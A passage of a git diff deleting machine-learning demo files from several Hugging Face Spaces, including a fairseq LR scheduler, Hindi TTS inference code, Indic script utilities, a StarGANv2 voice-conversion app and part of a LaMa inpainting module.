"entity_list": []}, - {"entity_type": "岗位职位", "label": 0, "entity_list": [ - {"entity_name": "公务员", "entity_type": "岗位职位", "entity_idx": [[18, 20]]}]}, - {"entity_type": "旅游景点", "label": 0, "entity_list": []} - ], - "id": 0}, - ] - - model = UbertPiplines(args) - model.fit(train_data, dev_data) - result = model.predict(test_data) - for line in result: - print(line) - - -if __name__ == "__main__": - main() diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/optim/lr_scheduler/triangular_lr_scheduler.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/optim/lr_scheduler/triangular_lr_scheduler.py deleted file mode 100644 index bfe2a0d381f28525f90ee120b31a69210338eb1b..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/optim/lr_scheduler/triangular_lr_scheduler.py +++ /dev/null @@ -1,83 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import math -from dataclasses import dataclass, field -from typing import List - -from omegaconf import II - -from fairseq.dataclass import FairseqDataclass -from fairseq.optim.lr_scheduler import FairseqLRScheduler, register_lr_scheduler - - -@dataclass -class TriangularLRScheduleConfig(FairseqDataclass): - max_lr: float = field( - default="???", metadata={"help": "max learning rate, must be more than cfg.lr"} - ) - lr_period_updates: float = field( - default=5000, - metadata={"help": "initial number of updates per period (cycle length)"}, - ) - lr_shrink: float = field( - default=0.1, metadata={"help": "shrink factor for annealing"} - ) - shrink_min: bool = field( - default=False, metadata={"help": "if set, also shrinks min lr"} - ) - lr: List[float] = II("optimization.lr") - - -@register_lr_scheduler("triangular", dataclass=TriangularLRScheduleConfig) -class TriangularLRSchedule(FairseqLRScheduler): - """Assign LR based on a triangular cyclical schedule. - - See https://arxiv.org/pdf/1506.01186.pdf for details. - """ - - def __init__(self, cfg: TriangularLRScheduleConfig, optimizer): - super().__init__(cfg, optimizer) - if len(cfg.lr) > 1: - raise ValueError( - "Cannot use a fixed learning rate schedule with triangular." - " Consider --lr-scheduler=fixed instead." - ) - - lr = cfg.lr[0] - - assert cfg.max_lr > lr, "max_lr must be more than lr" - self.min_lr = lr - self.max_lr = cfg.max_lr - self.stepsize = cfg.lr_period_updates // 2 - self.lr_shrink = cfg.lr_shrink - self.shrink_min = cfg.shrink_min - - # initial learning rate - self.lr = self.min_lr - self.optimizer.set_lr(self.lr) - - def step(self, epoch, val_loss=None): - """Update the learning rate at the end of the given epoch.""" - super().step(epoch, val_loss) - # we don't change the learning rate at epoch boundaries - return self.optimizer.get_lr() - - def step_update(self, num_updates): - """Update the learning rate after each update.""" - cycle = math.floor(num_updates / (2 * self.stepsize)) - - lr_shrink = self.lr_shrink ** cycle - max_lr = self.max_lr * lr_shrink - if self.shrink_min: - min_lr = self.min_lr * lr_shrink - else: - min_lr = self.min_lr - - x = abs(num_updates / self.stepsize - 2 * (cycle + 1) + 1) - self.lr = min_lr + (max_lr - min_lr) * max(0, (1 - x)) - - self.optimizer.set_lr(self.lr) - return self.lr diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/scripts/sacrebleu.sh b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/scripts/sacrebleu.sh deleted file mode 100644 index c10bf2b76ea032deabab6f5c9d8a3e1e884f1642..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/scripts/sacrebleu.sh +++ /dev/null @@ -1,27 +0,0 @@ -#!/bin/bash - -if [ $# -ne 4 ]; then - echo "usage: $0 TESTSET SRCLANG TGTLANG GEN" - exit 1 -fi - -TESTSET=$1 -SRCLANG=$2 -TGTLANG=$3 - -GEN=$4 - -if ! command -v sacremoses &> /dev/null -then - echo "sacremoses could not be found, please install with: pip install sacremoses" - exit -fi - -grep ^H $GEN \ -| sed 's/^H\-//' \ -| sort -n -k 1 \ -| cut -f 3 \ -| sacremoses detokenize \ -> $GEN.sorted.detok - -sacrebleu --test-set $TESTSET --language-pair "${SRCLANG}-${TGTLANG}" < $GEN.sorted.detok diff --git a/spaces/Harveenchadha/Vakyansh-Hindi-TTS/ttsv/tts_infer/tts.py b/spaces/Harveenchadha/Vakyansh-Hindi-TTS/ttsv/tts_infer/tts.py deleted file mode 100644 index b373de8d62ce4aeb6ba5db5a07e8b018c347217b..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/Vakyansh-Hindi-TTS/ttsv/tts_infer/tts.py +++ /dev/null @@ -1,158 +0,0 @@ -from __future__ import absolute_import, division, print_function, unicode_literals -from typing import Tuple -import sys -from argparse import ArgumentParser - -import torch -import numpy as np -import os -import json -import torch - -sys.path.append(os.path.join(os.path.dirname(__file__), "../src/glow_tts")) - -from scipy.io.wavfile import write -from hifi.env import AttrDict -from hifi.models import Generator - - -from text import text_to_sequence -import commons -import models -import utils - - -def check_directory(dir): - if not os.path.exists(dir): - sys.exit("Error: {} directory does not exist".format(dir)) - - -class TextToMel: - def __init__(self, glow_model_dir, device="cuda"): - self.glow_model_dir = glow_model_dir - check_directory(self.glow_model_dir) - self.device = device - self.hps, self.glow_tts_model = self.load_glow_tts() - pass - - def load_glow_tts(self): - hps = utils.get_hparams_from_dir(self.glow_model_dir) - checkpoint_path = utils.latest_checkpoint_path(self.glow_model_dir) - symbols = list(hps.data.punc) + list(hps.data.chars) - glow_tts_model = models.FlowGenerator( - len(symbols) + getattr(hps.data, "add_blank", False), - out_channels=hps.data.n_mel_channels, - **hps.model - ) # .to(self.device) - - if self.device == "cuda": - glow_tts_model.to("cuda") - - utils.load_checkpoint(checkpoint_path, glow_tts_model) - glow_tts_model.decoder.store_inverse() - _ = glow_tts_model.eval() - - return hps, glow_tts_model - - def generate_mel(self, text, noise_scale=0.667, length_scale=1.0): - symbols = list(self.hps.data.punc) + list(self.hps.data.chars) - cleaner = self.hps.data.text_cleaners - if getattr(self.hps.data, "add_blank", False): - text_norm = text_to_sequence(text, symbols, cleaner) - text_norm = commons.intersperse(text_norm, len(symbols)) - else: # If not using "add_blank" option during training, adding spaces at the beginning and the end of utterance improves quality - text = " " + text.strip() + " " - text_norm = text_to_sequence(text, symbols, cleaner) - - sequence = np.array(text_norm)[None, :] - - del symbols - del cleaner - del text - del text_norm - - if self.device == "cuda": - x_tst = torch.autograd.Variable(torch.from_numpy(sequence)).cuda().long() - x_tst_lengths = torch.tensor([x_tst.shape[1]]).cuda() - else: - x_tst = torch.autograd.Variable(torch.from_numpy(sequence)).long() - x_tst_lengths = torch.tensor([x_tst.shape[1]]) - - with torch.no_grad(): - (y_gen_tst, *_), *_, (attn_gen, *_) = self.glow_tts_model( - x_tst, - x_tst_lengths, - gen=True, - noise_scale=noise_scale, - length_scale=length_scale, - ) - del x_tst - del x_tst_lengths - torch.cuda.empty_cache() - return y_gen_tst - #return y_gen_tst.cpu().detach().numpy() - - -class MelToWav: - def __init__(self, hifi_model_dir, device="cuda"): - self.hifi_model_dir = hifi_model_dir - check_directory(self.hifi_model_dir) - self.device = device - self.h, self.hifi_gan_generator = self.load_hifi_gan() - pass - - def load_hifi_gan(self): - checkpoint_path = utils.latest_checkpoint_path(self.hifi_model_dir, regex="g_*") - config_file = os.path.join(self.hifi_model_dir, "config.json") - data = open(config_file).read() - json_config = json.loads(data) - h = AttrDict(json_config) - torch.manual_seed(h.seed) - - generator = Generator(h).to(self.device) - - assert os.path.isfile(checkpoint_path) - print("Loading '{}'".format(checkpoint_path)) - state_dict_g = torch.load(checkpoint_path, map_location=self.device) - print("Complete.") - - generator.load_state_dict(state_dict_g["generator"]) - - generator.eval() - generator.remove_weight_norm() - - return h, generator - - def generate_wav(self, mel): - #mel = torch.FloatTensor(mel).to(self.device) - - y_g_hat = self.hifi_gan_generator(mel.to(self.device)) # passing through vocoder - audio = y_g_hat.squeeze() - audio = audio * 32768.0 - audio = audio.cpu().detach().numpy().astype("int16") - - del y_g_hat - del mel - torch.cuda.empty_cache() - return audio, self.h.sampling_rate - - -if __name__ == "__main__": - - parser = ArgumentParser() - parser.add_argument("-m", "--model", required=True, type=str) - parser.add_argument("-g", "--gan", required=True, type=str) - parser.add_argument("-d", "--device", type=str, default="cpu") - parser.add_argument("-t", "--text", type=str, required=True) - parser.add_argument("-w", "--wav", type=str, required=True) - args = parser.parse_args() - - text_to_mel = TextToMel(glow_model_dir=args.model, device=args.device) - mel_to_wav = MelToWav(hifi_model_dir=args.gan, device=args.device) - - mel = text_to_mel.generate_mel(args.text) - audio, sr = mel_to_wav.generate_wav(mel) - - write(filename=args.wav, rate=sr, data=audio) - - pass diff --git a/spaces/Harveenchadha/oiTrans/indic_nlp_library/indicnlp/langinfo.py b/spaces/Harveenchadha/oiTrans/indic_nlp_library/indicnlp/langinfo.py deleted file mode 100644 index efb7e372feeb67d7106eb5c443de2e14053fd204..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/oiTrans/indic_nlp_library/indicnlp/langinfo.py +++ /dev/null @@ -1,488 +0,0 @@ -# -# Copyright (c) 2013-present, Anoop Kunchukuttan -# All rights reserved. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. -# - -## language codes -LC_TA='ta' - -SCRIPT_RANGES={ - 'pa':[0x0a00,0x0a7f] , - 'gu':[0x0a80,0x0aff] , - 'or':[0x0b00,0x0b7f] , - 'ta':[0x0b80,0x0bff] , - 'te':[0x0c00,0x0c7f] , - 'kn':[0x0c80,0x0cff] , - 'ml':[0x0d00,0x0d7f] , - 'si':[0x0d80,0x0dff] , - 'hi':[0x0900,0x097f] , - 'mr':[0x0900,0x097f] , - 'kK':[0x0900,0x097f] , - 'sa':[0x0900,0x097f] , - 'ne':[0x0900,0x097f] , - 'sd':[0x0900,0x097f] , - 'bn':[0x0980,0x09ff] , - 'as':[0x0980,0x09ff] , - } - -DRAVIDIAN_LANGUAGES=['ta', 'te', 'kn', 'ml',] -IE_LANGUAGES=['hi', 'mr', 'kK', 'sa', 'ne', 'sd', 'bn', 'as', 'pa', 'gu', 'or', 'si', ] -DANDA_DELIM_LANGUAGES=['as','bn','hi','ne','or','pa','sa','sd'] - -URDU_RANGES=[ - [0x0600,0x06ff], - [0x0750,0x077f], - [0xfb50,0xfdff], - [0xfe70,0xfeff], - ] - -COORDINATED_RANGE_START_INCLUSIVE=0 -COORDINATED_RANGE_END_INCLUSIVE=0x6f - -NUMERIC_OFFSET_START=0x66 -NUMERIC_OFFSET_END=0x6f - -HALANTA_OFFSET=0x4d -AUM_OFFSET=0x50 -NUKTA_OFFSET=0x3c - -RUPEE_SIGN=0x20b9 - -DANDA=0x0964 -DOUBLE_DANDA=0x0965 - -#TODO: add missing fricatives and approximants -VELAR_RANGE=[0x15,0x19] -PALATAL_RANGE=[0x1a,0x1e] -RETROFLEX_RANGE=[0x1f,0x23] -DENTAL_RANGE=[0x24,0x29] -LABIAL_RANGE=[0x2a,0x2e] - -# verify -VOICED_LIST=[0x17,0x18,0x1c,0x1d,0x21,0x22,0x26,0x27,0x2c,0x2d] -UNVOICED_LIST=[0x15,0x16,0x1a,0x1b,0x1f,0x20,0x24,0x25,0x2a,0x2b] #TODO: add sibilants/sonorants -ASPIRATED_LIST=[0x16,0x18,0x1b,0x1d,0x20,0x22,0x25,0x27,0x2b,0x2d] -UNASPIRATED_LIST=[0x15,0x17,0x1a,0x1c,0x1f,0x21,0x24,0x26,0x2a,0x2c] -NASAL_LIST=[0x19,0x1e,0x23,0x28,0x29,0x2d] -FRICATIVE_LIST=[0x36,0x37,0x38] -APPROXIMANT_LIST=[0x2f,0x30,0x31,0x32,0x33,0x34,0x35] - -#TODO: ha has to be properly categorized - -def is_danda_delim(lang): - """ - Returns True if danda/double danda is a possible delimiter for the language - """ - return lang in DANDA_DELIM_LANGUAGES - -def get_offset(c,lang): - """ - Applicable to Brahmi derived Indic scripts - """ - return ord(c)-SCRIPT_RANGES[lang][0] - -def offset_to_char(c,lang): - """ - Applicable to Brahmi derived Indic scripts - """ - return chr(c+SCRIPT_RANGES[lang][0]) - -def in_coordinated_range(c_offset): - """ - Applicable to Brahmi derived Indic scripts - """ - return (c_offset>=COORDINATED_RANGE_START_INCLUSIVE and c_offset<=COORDINATED_RANGE_END_INCLUSIVE) - -def is_indiclang_char(c,lang): - """ - Applicable to Brahmi derived Indic scripts - """ - o=get_offset(c,lang) - return (o>=0 and o<=0x7f) or ord(c)==DANDA or ord(c)==DOUBLE_DANDA - -# def is_vowel(c,lang): -# """ -# Is the character a vowel -# """ -# o=get_offset(c,lang) -# return (o>=0x04 and o<=0x14) - -# def is_vowel_sign(c,lang): -# """ -# Is the character a vowel sign (maatraa) -# """ -# o=get_offset(c,lang) -# return (o>=0x3e and o<=0x4c) - -# def is_halanta(c,lang): -# """ -# Is the character the halanta character -# """ -# o=get_offset(c,lang) -# return (o==HALANTA_OFFSET) - -# def is_nukta(c,lang): -# """ -# Is the character the halanta character -# """ -# o=get_offset(c,lang) -# return (o==NUKTA_OFFSET) - -# def is_aum(c,lang): -# """ -# Is the character a vowel sign (maatraa) -# """ -# o=get_offset(c,lang) -# return (o==AUM_OFFSET) - -# def is_consonant(c,lang): -# """ -# Is the character a consonant -# """ -# o=get_offset(c,lang) -# return (o>=0x15 and o<=0x39) - -# def is_velar(c,lang): -# """ -# Is the character a velar -# """ -# o=get_offset(c,lang) -# return (o>=VELAR_RANGE[0] and o<=VELAR_RANGE[1]) - -# def is_palatal(c,lang): -# """ -# Is the character a palatal -# """ -# o=get_offset(c,lang) -# return (o>=PALATAL_RANGE[0] and o<=PALATAL_RANGE[1]) - -# def is_retroflex(c,lang): -# """ -# Is the character a retroflex -# """ -# o=get_offset(c,lang) -# return (o>=RETROFLEX_RANGE[0] and o<=RETROFLEX_RANGE[1]) - -# def is_dental(c,lang): -# """ -# Is the character a dental -# """ -# o=get_offset(c,lang) -# return (o>=DENTAL_RANGE[0] and o<=DENTAL_RANGE[1]) - -# def is_labial(c,lang): -# """ -# Is the character a labial -# """ -# o=get_offset(c,lang) -# return (o>=LABIAL_RANGE[0] and o<=LABIAL_RANGE[1]) - -# def is_voiced(c,lang): -# """ -# Is the character a voiced consonant -# """ -# o=get_offset(c,lang) -# return o in VOICED_LIST - -# def is_unvoiced(c,lang): -# """ -# Is the character a unvoiced consonant -# """ -# o=get_offset(c,lang) -# return o in UNVOICED_LIST - -# def is_aspirated(c,lang): -# """ -# Is the character a aspirated consonant -# """ -# o=get_offset(c,lang) -# return o in ASPIRATED_LIST - -# def is_unaspirated(c,lang): -# """ -# Is the character a unaspirated consonant -# """ -# o=get_offset(c,lang) -# return o in UNASPIRATED_LIST - -# def is_nasal(c,lang): -# """ -# Is the character a nasal consonant -# """ -# o=get_offset(c,lang) -# return o in NASAL_LIST - -# def is_fricative(c,lang): -# """ -# Is the character a fricative consonant -# """ -# o=get_offset(c,lang) -# return o in FRICATIVE_LIST - -# def is_approximant(c,lang): -# """ -# Is the character an approximant consonant -# """ -# o=get_offset(c,lang) -# return o in APPROXIMANT_LIST - -# def is_number(c,lang): -# """ -# Is the character a number -# """ -# o=get_offset(c,lang) -# return (o>=0x66 and o<=0x6f) - - -def is_vowel(c,lang): - """ - Is the character a vowel - """ - o=get_offset(c,lang) - return (o>=0x04 and o<=0x14) - -def is_vowel_sign(c,lang): - """ - Is the character a vowel sign (maatraa) - """ - o=get_offset(c,lang) - return (o>=0x3e and o<=0x4c) - -def is_halanta(c,lang): - """ - Is the character the halanta character - """ - o=get_offset(c,lang) - return (o==HALANTA_OFFSET) - -def is_nukta(c,lang): - """ - Is the character the halanta character - """ - o=get_offset(c,lang) - return (o==NUKTA_OFFSET) - -def is_aum(c,lang): - """ - Is the character a vowel sign (maatraa) - """ - o=get_offset(c,lang) - return (o==AUM_OFFSET) - -def is_consonant(c,lang): - """ - Is the character a consonant - """ - o=get_offset(c,lang) - return (o>=0x15 and o<=0x39) - -def is_velar(c,lang): - """ - Is the character a velar - """ - o=get_offset(c,lang) - return (o>=VELAR_RANGE[0] and o<=VELAR_RANGE[1]) - -def is_palatal(c,lang): - """ - Is the character a palatal - """ - o=get_offset(c,lang) - return (o>=PALATAL_RANGE[0] and o<=PALATAL_RANGE[1]) - -def is_retroflex(c,lang): - """ - Is the character a retroflex - """ - o=get_offset(c,lang) - return (o>=RETROFLEX_RANGE[0] and o<=RETROFLEX_RANGE[1]) - -def is_dental(c,lang): - """ - Is the character a dental - """ - o=get_offset(c,lang) - return (o>=DENTAL_RANGE[0] and o<=DENTAL_RANGE[1]) - -def is_labial(c,lang): - """ - Is the character a labial - """ - o=get_offset(c,lang) - return (o>=LABIAL_RANGE[0] and o<=LABIAL_RANGE[1]) - -def is_voiced(c,lang): - """ - Is the character a voiced consonant - """ - o=get_offset(c,lang) - return o in VOICED_LIST - -def is_unvoiced(c,lang): - """ - Is the character a unvoiced consonant - """ - o=get_offset(c,lang) - return o in UNVOICED_LIST - -def is_aspirated(c,lang): - """ - Is the character a aspirated consonant - """ - o=get_offset(c,lang) - return o in ASPIRATED_LIST - -def is_unaspirated(c,lang): - """ - Is the character a unaspirated consonant - """ - o=get_offset(c,lang) - return o in UNASPIRATED_LIST - -def is_nasal(c,lang): - """ - Is the character a nasal consonant - """ - o=get_offset(c,lang) - return o in NASAL_LIST - -def is_fricative(c,lang): - """ - Is the character a fricative consonant - """ - o=get_offset(c,lang) - return o in FRICATIVE_LIST - -def is_approximant(c,lang): - """ - Is the character an approximant consonant - """ - o=get_offset(c,lang) - return o in APPROXIMANT_LIST - -def is_number(c,lang): - """ - Is the character a number - """ - o=get_offset(c,lang) - return (o>=0x66 and o<=0x6f) - - -################################################## - -def is_vowel_offset(c_offset): - """ - Is the offset a vowel - """ - return (c_offset>=0x04 and c_offset<=0x14) - -def is_vowel_sign_offset(c_offset): - """ - Is the offset a vowel sign (maatraa) - """ - return (c_offset>=0x3e and c_offset<=0x4c) - -def is_halanta_offset(c_offset): - """ - Is the offset the halanta offset - """ - return (c_offset==HALANTA_OFFSET) - -def is_nukta_offset(c_offset): - """ - Is the offset the halanta offset - """ - return (c_offset==NUKTA_OFFSET) - -def is_aum_offset(c_offset): - """ - Is the offset a vowel sign (maatraa) - """ - return (c_offset==AUM_OFFSET) - -def is_consonant_offset(c_offset): - """ - Is the offset a consonant - """ - return (c_offset>=0x15 and c_offset<=0x39) - -def is_velar_offset(c_offset): - """ - Is the offset a velar - """ - return (c_offset>=VELAR_RANGE[0] and c_offset<=VELAR_RANGE[1]) - -def is_palatal_offset(c_offset): - """ - Is the offset a palatal - """ - return (c_offset>=PALATAL_RANGE[0] and c_offset<=PALATAL_RANGE[1]) - -def is_retroflex_offset(c_offset): - """ - Is the offset a retroflex - """ - return (c_offset>=RETROFLEX_RANGE[0] and c_offset<=RETROFLEX_RANGE[1]) - -def is_dental_offset(c_offset): - """ - Is the offset a dental - """ - return (c_offset>=DENTAL_RANGE[0] and c_offset<=DENTAL_RANGE[1]) - -def is_labial_offset(c_offset): - """ - Is the offset a labial - """ - return (c_offset>=LABIAL_RANGE[0] and c_offset<=LABIAL_RANGE[1]) - -def is_voiced_offset(c_offset): - """ - Is the offset a voiced consonant - """ - return c_offset in VOICED_LIST - -def is_unvoiced_offset(c_offset): - """ - Is the offset a unvoiced consonant - """ - return c_offset in UNVOICED_LIST - -def is_aspirated_offset(c_offset): - """ - Is the offset a aspirated consonant - """ - return c_offset in ASPIRATED_LIST - -def is_unaspirated_offset(c_offset): - """ - Is the offset a unaspirated consonant - """ - return c_offset in UNASPIRATED_LIST - -def is_nasal_offset(c_offset): - """ - Is the offset a nasal consonant - """ - return c_offset in NASAL_LIST - -def is_fricative_offset(c_offset): - """ - Is the offset a fricative consonant - """ - return c_offset in FRICATIVE_LIST - -def is_approximant_offset(c_offset): - """ - Is the offset an approximant consonant - """ - return c_offset in APPROXIMANT_LIST - -def is_number_offset(c_offset): - """ - Is the offset a number - """ - return (c_offset>=0x66 and c_offset<=0x6f) diff --git a/spaces/Hexamind/GDOC/src/view/test_view.py b/spaces/Hexamind/GDOC/src/view/test_view.py deleted file mode 100644 index cb845ba4c6f6ef2bd66c3e988014808155e1ef45..0000000000000000000000000000000000000000 --- a/spaces/Hexamind/GDOC/src/view/test_view.py +++ /dev/null @@ -1,35 +0,0 @@ -import gradio as gr -import random - -with gr.Blocks() as test: - list_2 = ["choix21", "choix 22", "et choix 23"] - with gr.Row(): - with gr.Accordion("See Details") as grac: - gr.Markdown("lorem ipsum") - hide_btn = gr.Button("hide") - show_btn = gr.Button("show") - - def hide_fn(): - update_ = { - grac: gr.update(open=False) - } - return update_ - - def show_fn(): - update_ = { - grac: gr.update(open=True) - } - return update_ - - hide_btn.click(hide_fn, - inputs=[], - outputs=[grac]) - show_btn.click(show_fn, - inputs=[], - outputs=[grac]) - - - - -if __name__ == "__main__": - test.launch() diff --git a/spaces/HighCWu/starganv2vc-paddle/app.py b/spaces/HighCWu/starganv2vc-paddle/app.py deleted file mode 100644 index 1cc88dbf959a5f1912c853717bceaff00a0b1adf..0000000000000000000000000000000000000000 --- a/spaces/HighCWu/starganv2vc-paddle/app.py +++ /dev/null @@ -1,151 +0,0 @@ -import os -os.system("pip install gradio==2.9b24") - -import gradio as gr - - -vocoder_url = 'https://bj.bcebos.com/v1/ai-studio-online/e46d52315a504f1fa520528582a8422b6fa7006463844b84b8a2c3d21cc314db?/Vocoder.zip' -models_url = 'https://bj.bcebos.com/v1/ai-studio-online/6c081f29caad483ebd4cded087ee6ddbfc8dca8fb89d4ab69d44253ce5525e32?/Models.zip' - -from io import BytesIO -from zipfile import ZipFile -from urllib.request import urlopen - - -if not (os.path.isdir('Vocoder') and os.path.isdir('Models')): - for url in [vocoder_url, models_url]: - resp = urlopen(url) - zipfile = ZipFile(BytesIO(resp.read())) - zipfile.extractall() - - -import random -import yaml -from munch import Munch -import numpy as np -import paddle -from paddle import nn -import paddle.nn.functional as F -import paddleaudio -import librosa - -from starganv2vc_paddle.Utils.JDC.model import JDCNet -from starganv2vc_paddle.models import Generator, MappingNetwork, StyleEncoder - - -speakers = [225,228,229,230,231,233,236,239,240,244,226,227,232,243,254,256,258,259,270,273] - -to_mel = paddleaudio.features.MelSpectrogram( - n_mels=80, n_fft=2048, win_length=1200, hop_length=300) -to_mel.fbank_matrix[:] = paddle.load('starganv2vc_paddle/fbank_matrix.pd')['fbank_matrix'] -mean, std = -4, 4 - -def preprocess(wave): - wave_tensor = paddle.to_tensor(wave).astype(paddle.float32) - mel_tensor = to_mel(wave_tensor) - mel_tensor = (paddle.log(1e-5 + mel_tensor.unsqueeze(0)) - mean) / std - return mel_tensor - -def build_model(model_params={}): - args = Munch(model_params) - generator = Generator(args.dim_in, args.style_dim, args.max_conv_dim, w_hpf=args.w_hpf, F0_channel=args.F0_channel) - mapping_network = MappingNetwork(args.latent_dim, args.style_dim, args.num_domains, hidden_dim=args.max_conv_dim) - style_encoder = StyleEncoder(args.dim_in, args.style_dim, args.num_domains, args.max_conv_dim) - - nets_ema = Munch(generator=generator, - mapping_network=mapping_network, - style_encoder=style_encoder) - - return nets_ema - -def compute_style(speaker_dicts): - reference_embeddings = {} - for key, (path, speaker) in speaker_dicts.items(): - if path == "": - label = paddle.to_tensor([speaker], dtype=paddle.int64) - latent_dim = starganv2.mapping_network.shared[0].weight.shape[0] - ref = starganv2.mapping_network(paddle.randn([1, latent_dim]), label) - else: - wave, sr = librosa.load(path, sr=24000) - audio, index = librosa.effects.trim(wave, top_db=30) - if sr != 24000: - wave = librosa.resample(wave, sr, 24000) - mel_tensor = preprocess(wave) - - with paddle.no_grad(): - label = paddle.to_tensor([speaker], dtype=paddle.int64) - ref = starganv2.style_encoder(mel_tensor.unsqueeze(1), label) - reference_embeddings[key] = (ref, label) - - return reference_embeddings - -F0_model = JDCNet(num_class=1, seq_len=192) -params = paddle.load("Models/bst.pd")['net'] -F0_model.set_state_dict(params) -_ = F0_model.eval() - -import yaml -import paddle - -from yacs.config import CfgNode -from paddlespeech.t2s.models.parallel_wavegan import PWGGenerator - -with open('Vocoder/config.yml') as f: - voc_config = CfgNode(yaml.safe_load(f)) -voc_config["generator_params"].pop("upsample_net") -voc_config["generator_params"]["upsample_scales"] = voc_config["generator_params"].pop("upsample_params")["upsample_scales"] -vocoder = PWGGenerator(**voc_config["generator_params"]) -vocoder.remove_weight_norm() -vocoder.eval() -vocoder.set_state_dict(paddle.load('Vocoder/checkpoint-400000steps.pd')) - -model_path = 'Models/vc_ema.pd' - -with open('Models/config.yml') as f: - starganv2_config = yaml.safe_load(f) -starganv2 = build_model(model_params=starganv2_config["model_params"]) -params = paddle.load(model_path) -params = params['model_ema'] -_ = [starganv2[key].set_state_dict(params[key]) for key in starganv2] -_ = [starganv2[key].eval() for key in starganv2] -starganv2.style_encoder = starganv2.style_encoder -starganv2.mapping_network = starganv2.mapping_network -starganv2.generator = starganv2.generator - -# Compute speakers' styles under the Demo directory -speaker_dicts = {} -selected_speakers = [273, 259, 258, 243, 254, 244, 236, 233, 230, 228] -for s in selected_speakers: - k = s - speaker_dicts['p' + str(s)] = ('Demo/VCTK-corpus/p' + str(k) + '/p' + str(k) + '_023.wav', speakers.index(s)) - -reference_embeddings = compute_style(speaker_dicts) - -examples = [['Demo/VCTK-corpus/p243/p243_023.wav', 'p236'], ['Demo/VCTK-corpus/p236/p236_023.wav', 'p243']] - - -def app(wav_path, speaker_id): - audio, _ = librosa.load(wav_path, sr=24000) - audio = audio / np.max(np.abs(audio)) - audio.dtype = np.float32 - source = preprocess(audio) - ref = reference_embeddings[speaker_id][0] - - with paddle.no_grad(): - f0_feat = F0_model.get_feature_GAN(source.unsqueeze(1)) - out = starganv2.generator(source.unsqueeze(1), ref, F0=f0_feat) - - c = out.transpose([0,1,3,2]).squeeze() - y_out = vocoder.inference(c) - y_out = y_out.reshape([-1]) - - return (24000, y_out.numpy()) - -title="StarGANv2 Voice Conversion" -description="Gradio Demo for voice conversion using paddlepaddle. " - -iface = gr.Interface(app, [gr.inputs.Audio(source="microphone", type="filepath"), - gr.inputs.Radio(list(speaker_dicts.keys()), type="value", default='p228', label='speaker id')], - "audio", title=title, description=description, examples=examples) - -iface.launch() diff --git a/spaces/ICML2022/ICML2022_papers/style.css b/spaces/ICML2022/ICML2022_papers/style.css deleted file mode 100644 index e2b871457d13980ddfbbc35bf5da02a75ece292e..0000000000000000000000000000000000000000 --- a/spaces/ICML2022/ICML2022_papers/style.css +++ /dev/null @@ -1,22 +0,0 @@ -h1 { - text-align: center; -} -table a { - background-color: transparent; - color: #58a6ff; - text-decoration: none; -} -a:active, -a:hover { - outline-width: 0; -} -a:hover { - text-decoration: underline; -} -table, th, td { - border: 1px solid; -} -img#visitor-badge { - display: block; - margin: auto; -} diff --git a/spaces/InpaintAI/Inpaint-Anything/third_party/lama/saicinpainting/training/modules/ffc.py b/spaces/InpaintAI/Inpaint-Anything/third_party/lama/saicinpainting/training/modules/ffc.py deleted file mode 100644 index 2f8aeb1411fc1537916275fd3243706cc74b8d3c..0000000000000000000000000000000000000000 --- a/spaces/InpaintAI/Inpaint-Anything/third_party/lama/saicinpainting/training/modules/ffc.py +++ /dev/null @@ -1,433 +0,0 @@ -# Fast Fourier Convolution NeurIPS 2020 -# original implementation https://github.com/pkumivision/FFC/blob/main/model_zoo/ffc.py -# paper https://proceedings.neurips.cc/paper/2020/file/2fd5d41ec6cfab47e32164d5624269b1-Paper.pdf - -import numpy as np -import torch -import torch.nn as nn -import torch.nn.functional as F - -from saicinpainting.training.modules.base import get_activation, BaseDiscriminator -from saicinpainting.training.modules.spatial_transform import LearnableSpatialTransformWrapper -from saicinpainting.training.modules.squeeze_excitation import SELayer -from saicinpainting.utils import get_shape - - -class FFCSE_block(nn.Module): - - def __init__(self, channels, ratio_g): - super(FFCSE_block, self).__init__() - in_cg = int(channels * ratio_g) - in_cl = channels - in_cg - r = 16 - - self.avgpool = nn.AdaptiveAvgPool2d((1, 1)) - self.conv1 = nn.Conv2d(channels, channels // r, - kernel_size=1, bias=True) - self.relu1 = nn.ReLU(inplace=True) - self.conv_a2l = None if in_cl == 0 else nn.Conv2d( - channels // r, in_cl, kernel_size=1, bias=True) - self.conv_a2g = None if in_cg == 0 else nn.Conv2d( - channels // r, in_cg, kernel_size=1, bias=True) - self.sigmoid = nn.Sigmoid() - - def forward(self, x): - x = x if type(x) is tuple else (x, 0) - id_l, id_g = x - - x = id_l if type(id_g) is int else torch.cat([id_l, id_g], dim=1) - x = self.avgpool(x) - x = self.relu1(self.conv1(x)) - - x_l = 0 if self.conv_a2l is None else id_l * \ - self.sigmoid(self.conv_a2l(x)) - x_g = 0 if self.conv_a2g is None else id_g * \ - self.sigmoid(self.conv_a2g(x)) - return x_l, x_g - - -class FourierUnit(nn.Module): - - def __init__(self, in_channels, out_channels, groups=1, spatial_scale_factor=None, spatial_scale_mode='bilinear', - spectral_pos_encoding=False, use_se=False, se_kwargs=None, ffc3d=False, fft_norm='ortho'): - # bn_layer not used - super(FourierUnit, self).__init__() - self.groups = groups - - self.conv_layer = torch.nn.Conv2d(in_channels=in_channels * 2 + (2 if spectral_pos_encoding else 0), - out_channels=out_channels * 2, - kernel_size=1, stride=1, padding=0, groups=self.groups, bias=False) - self.bn = torch.nn.BatchNorm2d(out_channels * 2) - self.relu = torch.nn.ReLU(inplace=True) - - # squeeze and excitation block - self.use_se = use_se - if use_se: - if se_kwargs is None: - se_kwargs = {} - self.se = SELayer(self.conv_layer.in_channels, **se_kwargs) - - self.spatial_scale_factor = spatial_scale_factor - self.spatial_scale_mode = spatial_scale_mode - self.spectral_pos_encoding = spectral_pos_encoding - self.ffc3d = ffc3d - self.fft_norm = fft_norm - - def forward(self, x): - batch = x.shape[0] - - if 